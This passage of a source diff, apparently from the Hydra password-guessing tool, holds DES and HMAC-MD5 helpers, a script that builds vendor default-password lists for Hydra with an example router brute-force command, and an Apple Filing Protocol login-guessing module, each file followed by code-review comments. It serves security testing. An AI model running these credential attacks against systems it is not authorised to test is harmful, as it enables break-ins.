0x01010004L, 0x00010000L, 0x00010400L, 0x01000004L,
0x00000400L, 0x00000004L, 0x01000404L, 0x00010404L,
0x01010404L, 0x00010004L, 0x01010000L, 0x01000404L,
0x01000004L, 0x00000404L, 0x00010404L, 0x01010400L,
0x00000404L, 0x01000400L, 0x01000400L, 0x00000000L,
0x00010004L, 0x00010400L, 0x00000000L, 0x01010004L
};
static unsigned long SP2[64] = {
0x80108020L, 0x80008000L, 0x00008000L, 0x00108020L,
0x00100000L, 0x00000020L, 0x80100020L, 0x80008020L,
0x80000020L, 0x80108020L, 0x80108000L, 0x80000000L,
0x80008000L, 0x00100000L, 0x00000020L, 0x80100020L,
0x00108000L, 0x00100020L, 0x80008020L, 0x00000000L,
0x80000000L, 0x00008000L, 0x00108020L, 0x80100000L,
0x00100020L, 0x80000020L, 0x00000000L, 0x00108000L,
0x00008020L, 0x80108000L, 0x80100000L, 0x00008020L,
0x00000000L, 0x00108020L, 0x80100020L, 0x00100000L,
0x80008020L, 0x80100000L, 0x80108000L, 0x00008000L,
0x80100000L, 0x80008000L, 0x00000020L, 0x80108020L,
0x00108020L, 0x00000020L, 0x00008000L, 0x80000000L,
0x00008020L, 0x80108000L, 0x00100000L, 0x80000020L,
0x00100020L, 0x80008020L, 0x80000020L, 0x00100020L,
0x00108000L, 0x00000000L, 0x80008000L, 0x00008020L,
0x80000000L, 0x80100020L, 0x80108020L, 0x00108000L
};
static unsigned long SP3[64] = {
0x00000208L, 0x08020200L, 0x00000000L, 0x08020008L,
0x08000200L, 0x00000000L, 0x00020208L, 0x08000200L,
0x00020008L, 0x08000008L, 0x08000008L, 0x00020000L,
0x08020208L, 0x00020008L, 0x08020000L, 0x00000208L,
0x08000000L, 0x00000008L, 0x08020200L, 0x00000200L,
0x00020200L, 0x08020000L, 0x08020008L, 0x00020208L,
0x08000208L, 0x00020200L, 0x00020000L, 0x08000208L,
0x00000008L, 0x08020208L, 0x00000200L, 0x08000000L,
0x08020200L, 0x08000000L, 0x00020008L, 0x00000208L,
0x00020000L, 0x08020200L, 0x08000200L, 0x00000000L,
0x00000200L, 0x00020008L, 0x08020208L, 0x08000200L,
0x08000008L, 0x00000200L, 0x00000000L, 0x08020008L,
0x08000208L, 0x00020000L, 0x08000000L, 0x08020208L,
0x00000008L, 0x00020208L, 0x00020200L, 0x08000008L,
0x08020000L, 0x08000208L, 0x00000208L, 0x08020000L,
0x00020208L, 0x00000008L, 0x08020008L, 0x00020200L
};
static unsigned long SP4[64] = {
0x00802001L, 0x00002081L, 0x00002081L, 0x00000080L,
0x00802080L, 0x00800081L, 0x00800001L, 0x00002001L,
0x00000000L, 0x00802000L, 0x00802000L, 0x00802081L,
0x00000081L, 0x00000000L, 0x00800080L, 0x00800001L,
0x00000001L, 0x00002000L, 0x00800000L, 0x00802001L,
0x00000080L, 0x00800000L, 0x00002001L, 0x00002080L,
0x00800081L, 0x00000001L, 0x00002080L, 0x00800080L,
0x00002000L, 0x00802080L, 0x00802081L, 0x00000081L,
0x00800080L, 0x00800001L, 0x00802000L, 0x00802081L,
0x00000081L, 0x00000000L, 0x00000000L, 0x00802000L,
0x00002080L, 0x00800080L, 0x00800081L, 0x00000001L,
0x00802001L, 0x00002081L, 0x00002081L, 0x00000080L,
0x00802081L, 0x00000081L, 0x00000001L, 0x00002000L,
0x00800001L, 0x00002001L, 0x00802080L, 0x00800081L,
0x00002001L, 0x00002080L, 0x00800000L, 0x00802001L,
0x00000080L, 0x00800000L, 0x00002000L, 0x00802080L
};
static unsigned long SP5[64] = {
0x00000100L, 0x02080100L, 0x02080000L, 0x42000100L,
0x00080000L, 0x00000100L, 0x40000000L, 0x02080000L,
0x40080100L, 0x00080000L, 0x02000100L, 0x40080100L,
0x42000100L, 0x42080000L, 0x00080100L, 0x40000000L,
0x02000000L, 0x40080000L, 0x40080000L, 0x00000000L,
0x40000100L, 0x42080100L, 0x42080100L, 0x02000100L,
0x42080000L, 0x40000100L, 0x00000000L, 0x42000000L,
0x02080100L, 0x02000000L, 0x42000000L, 0x00080100L,
0x00080000L, 0x42000100L, 0x00000100L, 0x02000000L,
0x40000000L, 0x02080000L, 0x42000100L, 0x40080100L,
0x02000100L, 0x40000000L, 0x42080000L, 0x02080100L,
0x40080100L, 0x00000100L, 0x02000000L, 0x42080000L,
0x42080100L, 0x00080100L, 0x42000000L, 0x42080100L,
0x02080000L, 0x00000000L, 0x40080000L, 0x42000000L,
0x00080100L, 0x02000100L, 0x40000100L, 0x00080000L,
0x00000000L, 0x40080000L, 0x02080100L, 0x40000100L
};
static unsigned long SP6[64] = {
0x20000010L, 0x20400000L, 0x00004000L, 0x20404010L,
0x20400000L, 0x00000010L, 0x20404010L, 0x00400000L,
0x20004000L, 0x00404010L, 0x00400000L, 0x20000010L,
0x00400010L, 0x20004000L, 0x20000000L, 0x00004010L,
0x00000000L, 0x00400010L, 0x20004010L, 0x00004000L,
0x00404000L, 0x20004010L, 0x00000010L, 0x20400010L,
0x20400010L, 0x00000000L, 0x00404010L, 0x20404000L,
0x00004010L, 0x00404000L, 0x20404000L, 0x20000000L,
0x20004000L, 0x00000010L, 0x20400010L, 0x00404000L,
0x20404010L, 0x00400000L, 0x00004010L, 0x20000010L,
0x00400000L, 0x20004000L, 0x20000000L, 0x00004010L,
0x20000010L, 0x20404010L, 0x00404000L, 0x20400000L,
0x00404010L, 0x20404000L, 0x00000000L, 0x20400010L,
0x00000010L, 0x00004000L, 0x20400000L, 0x00404010L,
0x00004000L, 0x00400010L, 0x20004010L, 0x00000000L,
0x20404000L, 0x20000000L, 0x00400010L, 0x20004010L
};
static unsigned long SP7[64] = {
0x00200000L, 0x04200002L, 0x04000802L, 0x00000000L,
0x00000800L, 0x04000802L, 0x00200802L, 0x04200800L,
0x04200802L, 0x00200000L, 0x00000000L, 0x04000002L,
0x00000002L, 0x04000000L, 0x04200002L, 0x00000802L,
0x04000800L, 0x00200802L, 0x00200002L, 0x04000800L,
0x04000002L, 0x04200000L, 0x04200800L, 0x00200002L,
0x04200000L, 0x00000800L, 0x00000802L, 0x04200802L,
0x00200800L, 0x00000002L, 0x04000000L, 0x00200800L,
0x04000000L, 0x00200800L, 0x00200000L, 0x04000802L,
0x04000802L, 0x04200002L, 0x04200002L, 0x00000002L,
0x00200002L, 0x04000000L, 0x04000800L, 0x00200000L,
0x04200800L, 0x00000802L, 0x00200802L, 0x04200800L,
0x00000802L, 0x04000002L, 0x04200802L, 0x04200000L,
0x00200800L, 0x00000000L, 0x00000002L, 0x04200802L,
0x00000000L, 0x00200802L, 0x04200000L, 0x00000800L,
0x04000002L, 0x04000800L, 0x00000800L, 0x00200002L
};
static unsigned long SP8[64] = {
0x10001040L, 0x00001000L, 0x00040000L, 0x10041040L,
0x10000000L, 0x10001040L, 0x00000040L, 0x10000000L,
0x00040040L, 0x10040000L, 0x10041040L, 0x00041000L,
0x10041000L, 0x00041040L, 0x00001000L, 0x00000040L,
0x10040000L, 0x10000040L, 0x10001000L, 0x00001040L,
0x00041000L, 0x00040040L, 0x10040040L, 0x10041000L,
0x00001040L, 0x00000000L, 0x00000000L, 0x10040040L,
0x10000040L, 0x10001000L, 0x00041040L, 0x00040000L,
0x00041040L, 0x00040000L, 0x10041000L, 0x00001000L,
0x00000040L, 0x10040040L, 0x00001000L, 0x00041040L,
0x10001000L, 0x00000040L, 0x10000040L, 0x10040000L,
0x10040040L, 0x10000000L, 0x00040000L, 0x10001040L,
0x00000000L, 0x10041040L, 0x00040040L, 0x10000040L,
0x10040000L, 0x10001000L, 0x10001040L, 0x00000000L,
0x10041040L, 0x00041000L, 0x00041000L, 0x00001040L,
0x00001040L, 0x00040040L, 0x10000000L, 0x10041000L
};
static void desfunc(block, keys)
register unsigned long *block, *keys;
{
register unsigned long fval, work, right, leftt;
register int round;
leftt = block[0];
right = block[1];
work = ((leftt >> 4) ^ right) & 0x0f0f0f0fL;
right ^= work;
leftt ^= (work << 4);
work = ((leftt >> 16) ^ right) & 0x0000ffffL;
right ^= work;
leftt ^= (work << 16);
work = ((right >> 2) ^ leftt) & 0x33333333L;
leftt ^= work;
right ^= (work << 2);
work = ((right >> 8) ^ leftt) & 0x00ff00ffL;
leftt ^= work;
right ^= (work << 8);
right = ((right << 1) | ((right >> 31) & 1L)) & 0xffffffffL;
work = (leftt ^ right) & 0xaaaaaaaaL;
leftt ^= work;
right ^= work;
leftt = ((leftt << 1) | ((leftt >> 31) & 1L)) & 0xffffffffL;
for (round = 0; round < 8; round++) {
work = (right << 28) | (right >> 4);
work ^= *keys++;
fval = SP7[work & 0x3fL];
fval |= SP5[(work >> 8) & 0x3fL];
fval |= SP3[(work >> 16) & 0x3fL];
fval |= SP1[(work >> 24) & 0x3fL];
work = right ^ *keys++;
fval |= SP8[work & 0x3fL];
fval |= SP6[(work >> 8) & 0x3fL];
fval |= SP4[(work >> 16) & 0x3fL];
fval |= SP2[(work >> 24) & 0x3fL];
leftt ^= fval;
work = (leftt << 28) | (leftt >> 4);
work ^= *keys++;
fval = SP7[work & 0x3fL];
fval |= SP5[(work >> 8) & 0x3fL];
fval |= SP3[(work >> 16) & 0x3fL];
fval |= SP1[(work >> 24) & 0x3fL];
work = leftt ^ *keys++;
fval |= SP8[work & 0x3fL];
fval |= SP6[(work >> 8) & 0x3fL];
fval |= SP4[(work >> 16) & 0x3fL];
fval |= SP2[(work >> 24) & 0x3fL];
right ^= fval;
}
right = (right << 31) | (right >> 1);
work = (leftt ^ right) & 0xaaaaaaaaL;
leftt ^= work;
right ^= work;
leftt = (leftt << 31) | (leftt >> 1);
work = ((leftt >> 8) ^ right) & 0x00ff00ffL;
right ^= work;
leftt ^= (work << 8);
work = ((leftt >> 2) ^ right) & 0x33333333L;
right ^= work;
leftt ^= (work << 2);
work = ((right >> 16) ^ leftt) & 0x0000ffffL;
leftt ^= work;
right ^= (work << 16);
work = ((right >> 4) ^ leftt) & 0x0f0f0f0fL;
leftt ^= work;
right ^= (work << 4);
*block++ = right;
*block = leftt;
return;
}
/* Validation sets:
*
* Single-length key, single-length plaintext -
* Key : 0123 4567 89ab cdef
* Plain : 0123 4567 89ab cde7
* Cipher : c957 4425 6a5e d31d
*
* Double-length key, single-length plaintext -
* Key : 0123 4567 89ab cdef fedc ba98 7654 3210
* Plain : 0123 4567 89ab cde7
* Cipher : 7f1d 0a77 826b 8aff
*
* Double-length key, double-length plaintext -
* Key : 0123 4567 89ab cdef fedc ba98 7654 3210
* Plain : 0123 4567 89ab cdef 0123 4567 89ab cdff
* Cipher : 27a0 8440 406a df60 278f 47cf 42d6 15d7
*
* Triple-length key, single-length plaintext -
* Key : 0123 4567 89ab cdef fedc ba98 7654 3210 89ab cdef 0123 4567
* Plain : 0123 4567 89ab cde7
* Cipher : de0b 7c06 ae5e 0ed5
*
* Triple-length key, double-length plaintext -
* Key : 0123 4567 89ab cdef fedc ba98 7654 3210 89ab cdef 0123 4567
* Plain : 0123 4567 89ab cdef 0123 4567 89ab cdff
* Cipher : ad0d 1b30 ac17 cf07 0ed1 1c63 81e4 4de5
*
* d3des V5.0a rwo 9208.07 18:44 Graven Imagery
**********************************************************************/
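Review bot: the "Validation sets" comment at the end of the file no longer describes this code. The header comment says double and triple-length support was removed, so four of the five vectors cannot be run at all. It also says bytebit[] was reversed so that the most significant bit of each key byte is ignored, which means the remaining single-length vector will not reproduce the listed ciphertext either. Drop the block, or replace it with a vector computed for this key bit order and state that standard DES test vectors do not apply. Separately, the K&R-style definitions (deskey, cookey, cpkey, usekey, scrunch, unscrun, desfunc) should become prototyped definitions matching d3des.h, and deskey() and cookey() leave the expanded key in kn[] and dough[] on the stack without clearing it.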

56
d3des.h Normal file

@ -0,0 +1,56 @@
/*
* This is D3DES (V5.09) by Richard Outerbridge with the double and
* triple-length support removed for use in VNC.
*
* These changes are:
* Copyright (C) 1999 AT&T Laboratories Cambridge. All Rights Reserved.
*
* This software is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
*/
/* d3des.h -
*
* Headers and defines for d3des.c
* Graven Imagery, 1992.
*
* Copyright (c) 1988,1989,1990,1991,1992 by Richard Outerbridge
* (GEnie : OUTER; CIS : [71755,204])
*/
#define EN0 0 /* MODE == encrypt */
#define DE1 1 /* MODE == decrypt */
extern void deskey(unsigned char *, int);
/* hexkey[8] MODE
* Sets the internal key register according to the hexadecimal
* key contained in the 8 bytes of hexkey, according to the DES,
* for encryption or decryption according to MODE.
*/
extern void usekey(unsigned long *);
/* cookedkey[32]
* Loads the internal key register with the data in cookedkey.
*/
extern void cpkey(unsigned long *);
/* cookedkey[32]
* Copies the contents of the internal key register into the storage
* located at &cookedkey[0].
*/
extern void des(unsigned char *, unsigned char *);
/* from[8] to[8]
* Encrypts/Decrypts (according to the key currently loaded in the
* internal key register) one block of eight bytes at address 'from'
* into the block at address 'to'. They can be the same.
*/
/* d3des.h V5.09 rwo 9208.04 15:06 Graven Imagery
********************************************************************/
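Review bot: d3des.h has no include guard, unlike crc32.h in the same commit. It holds only macros and extern declarations, so a double include happens to compile today, but an #ifndef D3DES_H / #define D3DES_H / #endif wrapper keeps it safe if a type is added later. The comment on deskey() should also record what the d3des.c header states, that this variant ignores the most significant bit of each key byte rather than the least significant, because a caller passing a standard DES key will otherwise get non-standard output without any hint why.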

187
dpl4hydra.sh Executable file

@ -0,0 +1,187 @@
#!/bin/sh
#
# Name: dpl4hydra
# Version: 0.9.9
# Date: 2012-04-16
# Author: Roland Kessler / Twitter: @rokessler
# Synopsis: Generates a (d)efault (p)assword (l)ist as input for THC hydra.
# Credits: Thanks to van Hauser for support and fixing portability issues.
# "The universe is an intelligence test." -Timothy Leary (R.I.P.)
INSTALLDIR=/usr/local
LOCATION=etc
usage ()
{
cat <<EOF
dpl4hydra v0.9.9 (c) 2012 by Roland Kessler (@rokessler)
Syntax: `basename $0` [help] | [refresh] | [BRAND] | [all]
This script depends on a local (d)efault (p)assword (l)ist called
${FULLFILE}. If it is not available, regenerate it with
'`basename $0` refresh'. Source of the default password list is
$SITE
Options:
help Help: Show this message
refresh Refresh list: Download the full (d)efault (p)assword (l)ist
and generate a new local ${FULLFILE} file. Takes time!
BRAND Generates a (d)efault (p)assword (l)ist from the local file
${FULLFILE}, limiting the output to BRAND systems, using
the format username:password (as required by THC hydra).
The output file is called dpl4hydra_BRAND.lst.
all Dump list of all systems credentials into dpl4hydra_all.lst.
Example:
# `basename $0` linksys
File dpl4hydra_linksys.lst was created with 20 entries.
# hydra -C ./dpl4hydra_linksys.lst -t 1 192.168.1.1 http-get /index.asp
EOF
}
refresh ()
{
echo
echo "Trying to locate wget or curl... " | tr -d "\n"
which wget >/dev/null 2>&1 && FETCH="wget -q -O -"
which curl >/dev/null 2>&1 && FETCH="curl -s"
if [ -n "$FETCH" ]; then
echo "done."
echo "Using `echo $FETCH | cut -d ' ' -f 1` for downloading data."
echo
else
echo
echo "ERROR: Cannot refresh the list without wget or curl. Aborting." >&2
echo
exit 1
fi
echo "Trying to download list of vendors from"
echo "${SITE}... " | tr -d "\n"
$FETCH $SITE > $INDEXSITE 2>/dev/null || { echo; echo; echo "ERROR: Downloading data to disk failed. Network down?" >&2; echo; rm $INDEXSITE; exit 1; }
echo "done."
echo
cat $INDEXSITE | grep td | awk -F"\"" '{ print $8 }' | grep http > $SUBSITES
rm $INDEXSITE
if [ -r $FULLFILE ]; then
echo "Moving existing password list to ${OLDFILE}."
echo
mv $FULLFILE $OLDFILE || { echo "ERROR: Moving file $FULLFILE failed. Please check." >&2; echo; exit 1; }
fi
for SUBSITE in `cat $SUBSITES`; do
VENDOR=`echo $SUBSITE | awk -F"-" '{ print $3 }' | sed 's/.htm//'`
echo "Downloading default passwords for ${VENDOR}... " | tr -d "\n"
$FETCH $SUBSITE | grep -i tr | grep -i td | grep -i celltext | sed 's/<[^>]*>/,/g' | sed 's/,,*/,/g' | sed 's/^,//g' | tr -d "\r" >dpl4hydra_${VENDOR}.tmp || { echo "not found - skipping... " | tr -d "\n" ; }
while read SYSTEM; do
echo "${VENDOR}," | tr -d "\n" >> $FULLFILE
echo "$SYSTEM" >> $FULLFILE
done < dpl4hydra_${VENDOR}.tmp
rm dpl4hydra_${VENDOR}.tmp
echo "done."
done
rm $SUBSITES
if [ ! -r $LOCALFILE ]; then
echo
echo "ERROR: Cannot access local file ${LOCALFILE}. Skipping." >&2
echo
else
echo
echo "Merging download with ${LOCALFILE}... " | tr -d "\n"
cat $LOCALFILE >> $FULLFILE || { echo; echo "ERROR: Merging of $FULLFILE and $LOCALFILE failed. Please check." >&2; echo; exit 1; }
echo "done."
fi
echo "Cleaning up and sorting ${FULLFILE}... " | tr -d "\n"
cat $FULLFILE | sed 's/(null)//g' | sed 's/(Null)//g' | sed 's/(NULL)//g' | sed 's/(blank)//g' | sed 's/(Blank)//g' | sed 's/(BLANK)//g' | sed 's/(none)//g' | sed 's/(None)//g' | sed 's/(NONE)//g' | sed 's/none//g' | sed 's/n\/a//g' | sed 's/&lt;/</g' | sed 's/&gt;/>/g' | sed 's/&nbsp;//g' | sort | uniq > $CLEANFILE
mv $CLEANFILE $FULLFILE
echo "done."
echo
echo "Refreshed (d)efault (p)assword (l)ist $FULLFILE"
echo "was created with `wc -l $FULLFILE | awk '{ print $1 }'` entries."
echo
}
generate ()
{
HYDRAFILE=`echo "dpl4hydra_${BRAND}.lst" | tr '/ =:@\\|;<>"'"'" '_____________'`
if [ ! -r $FULLFILE ]; then
echo
echo "ERROR: Cannot access input file ${FULLFILE}" >&2
echo " You can rebuild it with '`basename $0` refresh'." >&2
echo
echo " Trying to use $LOCALFILE instead... " | tr -d "\n"
if [ -r $LOCALFILE ]; then
FULLFILE=$LOCALFILE
echo "done."
else
echo
echo "ERROR: Cannot access local file ${LOCALFILE}. Aborting." >&2
echo
exit 1
fi
fi
cat $FULLFILE 2>/dev/null | grep -i "$PATTERN" | awk -F"," '{ print $5":"$6 }' | sed 's/^[ \t]*//' | sed 's/[ \t]*$//' | sort | uniq > $HYDRAFILE
ENTRIES=`wc -l $HYDRAFILE | awk '{ print $1 }'`
if [ "$ENTRIES" -eq 0 ]; then
rm -f $HYDRAFILE
echo
echo "ERROR: No matching entries found for $BRAND systems." >&2
echo " File $HYDRAFILE was not created." >&2
echo
exit 1
else
if [ "$ENTRIES" -eq 1 ]; then
echo
echo "File $HYDRAFILE was created with one entry."
echo
else
echo
echo "File $HYDRAFILE was created with $ENTRIES entries."
echo
fi
fi
}
LC_ALL=C
export LC_ALL
DPLPATH="."
test -r "$DPLPATH/dpl4hydra_full.csv" || DPLPATH="$INSTALLDIR/$LOCATION"
FULLFILE="$DPLPATH/dpl4hydra_full.csv"
OLDFILE="$DPLPATH/dpl4hydra_full.old"
LOCALFILE="$DPLPATH/dpl4hydra_local.csv"
INDEXSITE="$DPLPATH/dpl4hydra_index.tmp"
SUBSITES="$DPLPATH/dpl4hydra_subs.tmp"
CLEANFILE="$DPLPATH/dpl4hydra_clean.tmp"
SITE="http://open-sez.me/passwd.htm"
case $# in
0) usage
exit 0;;
1) OPT=`echo $1 | tr "[A-Z]" "[a-z]"`;;
*) echo
echo "ERROR: Too many options." >&2
usage
exit 1;;
esac
case "$OPT" in
"-h" | "help" | "-help" | "--help") usage;;
"-r" | "refresh" | "-refresh" | "--refresh") refresh;;
"-a" | "all" | "-all" | "--all") PATTERN=","
BRAND="all"
generate;;
*) PATTERN="${OPT}"
BRAND="$OPT"
generate;;
esac
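Review bot: refresh() trusts everything it fetches from SITE, which is a plain http:// URL. The sub-page URLs scraped into $SUBSITES are expanded unquoted into `$FETCH $SUBSITE`, and VENDOR, cut out of that URL with awk and sed, goes straight into the file name dpl4hydra_${VENDOR}.tmp that is written and then removed. A modified or spoofed index page can therefore influence which arguments the downloader receives and which paths the script writes and deletes. Quote the expansions, restrict VENDOR to a safe character set the way generate() already does for HYDRAFILE with tr, and create the temporary files with mktemp instead of fixed names under $DPLPATH and the current directory. In generate(), `grep -i "$PATTERN"` treats the brand as a regular expression; `grep -F` would match it literally.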

8807
dpl4hydra_full.csv Executable file

File diff suppressed because it is too large

8807
dpl4hydra_local.csv Executable file

File diff suppressed because it is too large

135
hmacmd5.c Normal file

@ -0,0 +1,135 @@
/*
Unix SMB/CIFS implementation.
HMAC MD5 code for use in NTLMv2
Copyright (C) Luke Kenneth Casson Leighton 1996-2000
Copyright (C) Andrew Tridgell 1992-2000
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*/
/* taken direct from rfc2104 implementation and modified for suitable use
* for ntlmv2.
*/
#ifdef LIBOPENSSL
#include <string.h>
#include "hmacmd5.h"
#define ZERO_STRUCT(x) memset((char *)&(x), 0, sizeof(x))
/***********************************************************************
the rfc 2104 version of hmac_md5 initialisation.
***********************************************************************/
void hmac_md5_init_rfc2104(const unsigned char *key, int key_len, HMACMD5Context * ctx) {
int i;
unsigned char tk[16];
/* if key is longer than 64 bytes reset it to key=MD5(key) */
if (key_len > 64) {
MD5_CTX tctx;
MD5_Init(&tctx);
MD5_Update(&tctx, (void *) key, key_len);
MD5_Final(tk, &tctx);
key = tk;
key_len = 16;
}
/* start out by storing key in pads */
ZERO_STRUCT(ctx->k_ipad);
ZERO_STRUCT(ctx->k_opad);
memcpy(ctx->k_ipad, key, key_len);
memcpy(ctx->k_opad, key, key_len);
/* XOR key with ipad and opad values */
for (i = 0; i < 64; i++) {
ctx->k_ipad[i] ^= 0x36;
ctx->k_opad[i] ^= 0x5c;
}
MD5_Init(&ctx->ctx);
MD5_Update(&ctx->ctx, ctx->k_ipad, 64);
}
/***********************************************************************
the microsoft version of hmac_md5 initialisation.
***********************************************************************/
void hmac_md5_init_limK_to_64(const unsigned char *key, int key_len, HMACMD5Context * ctx) {
int i;
/* if key is longer than 64 bytes truncate it */
if (key_len > 64) {
key_len = 64;
}
/* start out by storing key in pads */
ZERO_STRUCT(ctx->k_ipad);
ZERO_STRUCT(ctx->k_opad);
memcpy(ctx->k_ipad, key, key_len);
memcpy(ctx->k_opad, key, key_len);
/* XOR key with ipad and opad values */
for (i = 0; i < 64; i++) {
ctx->k_ipad[i] ^= 0x36;
ctx->k_opad[i] ^= 0x5c;
}
MD5_Init(&ctx->ctx);
MD5_Update(&ctx->ctx, ctx->k_ipad, 64);
}
/***********************************************************************
update hmac_md5 "inner" buffer
***********************************************************************/
void hmac_md5_update(const unsigned char *text, int text_len, HMACMD5Context * ctx) {
MD5_Update(&ctx->ctx, (void *) text, text_len); /* then text of datagram */
}
/***********************************************************************
finish off hmac_md5 "inner" buffer and generate outer one.
***********************************************************************/
void hmac_md5_final(unsigned char *digest, HMACMD5Context * ctx)
{
MD5_CTX ctx_o;
MD5_Final(digest, &ctx->ctx);
MD5_Init(&ctx_o);
MD5_Update(&ctx_o, ctx->k_opad, 64);
MD5_Update(&ctx_o, digest, 16);
MD5_Final(digest, &ctx_o);
}
/***********************************************************
single function to calculate an HMAC MD5 digest from data.
use the microsoft hmacmd5 init method because the key is 16 bytes.
************************************************************/
void hmac_md5(unsigned char key[16], unsigned char *data, int data_len, unsigned char *digest) {
HMACMD5Context ctx;
hmac_md5_init_limK_to_64(key, 16, &ctx);
if (data_len != 0) {
hmac_md5_update(data, data_len, &ctx);
}
hmac_md5_final(digest, &ctx);
}
#endif
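Review bot: both init functions take key_len as a signed int and only test `key_len > 64`, so a negative length passes the check and is converted to a very large size_t in `memcpy(ctx->k_ipad, key, key_len)`. Take a size_t, or reject key_len < 0 before the copy. The hashed key in tk[] in hmac_md5_init_rfc2104(), and the k_ipad/k_opad pads and ctx_o in hmac_md5_final(), stay in memory after use and should be cleared once the digest has been produced. The comment on hmac_md5_init_limK_to_64() should also state that for keys longer than 64 bytes it deliberately differs from RFC 2104 (truncation instead of MD5 of the key), so the two init functions are not swapped by mistake.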

40
hmacmd5.h Normal file

@ -0,0 +1,40 @@
/*
Unix SMB/CIFS implementation.
Interface header: Scheduler service
Copyright (C) Luke Kenneth Casson Leighton 1996-1999
Copyright (C) Andrew Tridgell 1992-1999
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*/
#include <openssl/md5.h>
#ifndef _HMAC_MD5_H
typedef struct {
MD5_CTX ctx;
unsigned char k_ipad[65];
unsigned char k_opad[65];
} HMACMD5Context;
#endif /* _HMAC_MD5_H */
void hmac_md5_init_rfc2104(const unsigned char *key, int key_len, HMACMD5Context *ctx);
void hmac_md5_init_limK_to_64(const unsigned char* key, int key_len,HMACMD5Context *ctx);
void hmac_md5_update(const unsigned char *text, int text_len, HMACMD5Context *ctx);
void hmac_md5_final(unsigned char *digest, HMACMD5Context *ctx);
void hmac_md5( unsigned char key[16], unsigned char *data, int data_len, unsigned char *digest);
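Review bot: the include guard does nothing. `#ifndef _HMAC_MD5_H` is tested but the macro is never defined, so including the header twice redefines HMACMD5Context, and the prototypes sit outside the guard in any case. Add the #define directly after the #ifndef, move the #endif to the end of the file, and use a name without the leading underscore followed by a capital letter, since such names are reserved for the implementation. The header also includes <openssl/md5.h> unconditionally while hmacmd5.c is wrapped in #ifdef LIBOPENSSL, so it may only be included under the same condition. The banner line "Interface header: Scheduler service" does not describe this file.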

184
hydra-afp.c Normal file

@ -0,0 +1,184 @@
/*
* Apple Filing Protocol Support - by David Maciejak @ GMAIL dot com
*
* tested with afpfs-ng 0.8.1
* AFPFS-NG: http://alexthepuffin.googlepages.com/home
*
*/
#include "hydra-mod.h"
#ifndef LIBAFP
void dummy_afp() {
printf("\n");
}
#else
#define FREE(x) \
if (x != NULL) { \
free(x); \
x = NULL; \
}
#include <stdio.h>
#include <afpfs-ng/afp.h>
#include <afpfs-ng/libafpclient.h>
extern char *HYDRA_EXIT;
void stdout_fct(void *priv, enum loglevels loglevel, int logtype, const char *message) {
//fprintf(stderr, "[ERROR] Caught unknown error %s\n", message);
}
static struct libafpclient afpclient = {
.unmount_volume = NULL,
.log_for_client = stdout_fct,
.forced_ending_hook = NULL,
.scan_extra_fds = NULL,
.loop_started = NULL,
};
static int server_subconnect(struct afp_url url) {
struct afp_connection_request *conn_req;
struct afp_server *server = NULL;
conn_req = malloc(sizeof(struct afp_connection_request));
server = malloc(sizeof(struct afp_server));
memset(conn_req, 0, sizeof(struct afp_connection_request));
conn_req->url = url;
conn_req->url.requested_version = 31;
//fprintf(stderr, "AFP connection - username: %s password: %s server: %s\n", url.username, url.password, url.servername);
if (strlen(url.uamname) > 0) {
if ((conn_req->uam_mask = find_uam_by_name(url.uamname)) == 0) {
fprintf(stderr, "[ERROR] Unknown UAM: %s", url.uamname);
FREE(conn_req);
FREE(server);
return -1;
}
} else {
conn_req->uam_mask = default_uams_mask();
}
//fprintf(stderr, "Initiating connection attempt.\n");
if ((server = afp_server_full_connect(NULL, conn_req)) == NULL) {
FREE(conn_req);
FREE(server);
return -1;
}
//fprintf(stderr, "Connected to server: %s via UAM: %s\n", server->server_name_printable, uam_bitmap_to_string(server->using_uam));
FREE(conn_req);
FREE(server);
return 0;
}
int start_afp(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass;
struct afp_url tmpurl;
/* Build AFP authentication request */
libafpclient_register(&afpclient);
afp_main_quick_startup(NULL);
init_uams();
afp_default_url(&tmpurl);
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
strncpy(tmpurl.servername, hydra_address2string(ip), AFP_SERVER_NAME_LEN - 1);
tmpurl.servername[AFP_SERVER_NAME_LEN] = 0;
memcpy(&tmpurl.username, login, AFP_MAX_USERNAME_LEN);
memcpy(&tmpurl.password, pass, AFP_MAX_PASSWORD_LEN);
if (server_subconnect(tmpurl) == 0) {
hydra_report_found_host(port, ip, "afp", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
} else {
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
}
return 1;
}
void service_afp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_AFP;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
}
if (sock < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
case 2:
/*
* Here we start the password cracking process
*/
next_run = start_afp(sock, ip, port, options, miscptr, fp);
break;
case 3:
if (sock >= 0)
